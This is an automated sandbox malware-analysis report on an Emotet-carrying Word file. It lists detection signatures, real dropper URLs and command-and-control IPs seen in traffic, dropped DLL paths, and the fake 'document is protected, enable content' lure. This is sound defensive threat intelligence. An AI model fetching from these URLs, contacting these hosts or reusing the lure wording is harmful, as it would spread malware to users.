Analysis Report Informacion_4-09757.doc

Overview

General Information

Sample Name: Informacion_4-09757.doc
Analysis ID: 336961
MD5: 4adc5e8e53a40fd14ff90e99e94e39cb
SHA1: 406d00f10a2298acfe192fb85e870d5e5d094263
SHA256: 1c29c870c5c27cec2f22790ecc87e0c1c1ae59bd4e5c8204ec9182524d68d68f

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://goldilockstraining.com/wp-includes/bftt/ Avira URL Cloud: Label: malware
Source: http://biglaughs.org/smallpotatoes/rRwRzc/ Avira URL Cloud: Label: malware
Source: http://paulscomputing.com/CraigsMagicSquare/H/ Avira URL Cloud: Label: malware
Source: http://goldcoastoffice365.com/temp/X/ Avira URL Cloud: Label: phishing
Source: http://goldcoastoffice365.com/temp/X/P Avira URL Cloud: Label: phishing
Source: http://azraktours.com/wp-content/NWF9jC/ Avira URL Cloud: Label: malware
Source: http://josegene.com/theme/gU8/ Avira URL Cloud: Label: malware
Source: https://jeffdahlke.com/css/bg4n3/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll ReversingLabs: Detection: 89%
Multi AV Scanner detection for submitted file
Source: Informacion_4-09757.doc Metadefender: Detection: 36%
Source: Informacion_4-09757.doc ReversingLabs: Detection: 75%
Machine Learning detection for dropped file
Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2101464007.000000001B3D0000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: paulscomputing.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://josegene.com/theme/gU8/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: https://jeffdahlke.com/css/bg4n3/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in memory: http://goldcoastoffice365.com/temp/X/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 167.71.148.58 167.71.148.58
Source: Joe Sandbox View IP Address: 202.187.222.40 202.187.222.40
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
Source: Joe Sandbox View ASN Name: SHAWCA SHAWCA
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /ta2men4jqfnerm/ HTTP/1.1DNT: 0Referer: 167.71.148.58/ta2men4jqfnerm/Content-Type: multipart/form-data; boundary=------------------NYbEqHIaKH4WS2W1IvUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7684Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4F87BA3-97C0-4A14-814E-1968BCE52029}.tmp
Source: global traffic HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: paulscomputing.com
Source: unknown HTTP traffic detected: POST /ta2men4jqfnerm/ HTTP/1.1DNT: 0Referer: 167.71.148.58/ta2men4jqfnerm/Content-Type: multipart/form-data; boundary=------------------NYbEqHIaKH4WS2W1IvUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7684Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://goldcoastoffice365.com/temp/X/
Source: powershell.exe, 00000005.00000002.2096848822.0000000002C06000.00000004.00000001.sdmp String found in binary or memory: http://goldcoastoffice365.com/temp/X/P
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: http://josegene.com/theme/gU8/
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2100658698.0000000003B1A000.00000004.00000001.sdmp String found in binary or memory: http://paulscomputing.com
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2101714623.000000001B551000.00000004.00000001.sdmp String found in binary or memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2104721248.0000000002830000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2095369580.0000000000367000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp String found in binary or memory: https://jeffdahlke.com/css/bg4n3/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2104434238.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107224679.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109356030.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097792177.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102227386.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346608733.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105642639.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107394819.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105597676.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2110979114.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109268872.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346635029.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099576537.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2100056068.0000000000701000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100874845.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2111023949.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I o' ' Wo'd"
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I o' ' Wo'd" N@m 13 ;a 10096 G) FI
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
Very long command line found
Source: unknown Process created: Commandline size = 7696
Source: unknown Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7605
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Ocet\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D270 7_2_1000D270
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011EA7 7_2_10011EA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012750 7_2_10012750
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012B5C 7_2_10012B5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001237C 7_2_1001237C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012F7C 7_2_10012F7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6005 7_2_001E6005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3C28 7_2_001E3C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E7C4A 7_2_001E7C4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EC44B 7_2_001EC44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F1079 7_2_001F1079
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EE871 7_2_001EE871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F0065 7_2_001F0065
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F4460 7_2_001F4460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EE499 7_2_001EE499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F9494 7_2_001F9494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FC48F 7_2_001FC48F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EBCA5 7_2_001EBCA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F5CCB 7_2_001F5CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EA4E1 7_2_001EA4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F1913 7_2_001F1913
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E510E 7_2_001E510E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F5136 7_2_001F5136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6D2C 7_2_001E6D2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001EDD24 7_2_001EDD24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3521 7_2_001E3521
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FBD5E 7_2_001FBD5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E415F 7_2_001E415F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F7D78 7_2_001F7D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FA59F 7_2_001FA59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001FB59B 7_2_001FB59B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E7D94 7_2_001E7D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E4DB8 7_2_001E4DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F41AD 7_2_001F41AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E75A0 7_2_001E75A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F2DE1 7_2_001F2DE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E2A18 7_2_001E2A18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E0A00 7_2_001E0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F2A00 7_2_001F2A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00201600 7_2_00201600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F6E50 7_2_001F6E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F1E7D 7_2_001F1E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E367A 7_2_001E367A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F8279 7_2_001F8279
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6A6F 7_2_001E6A6F
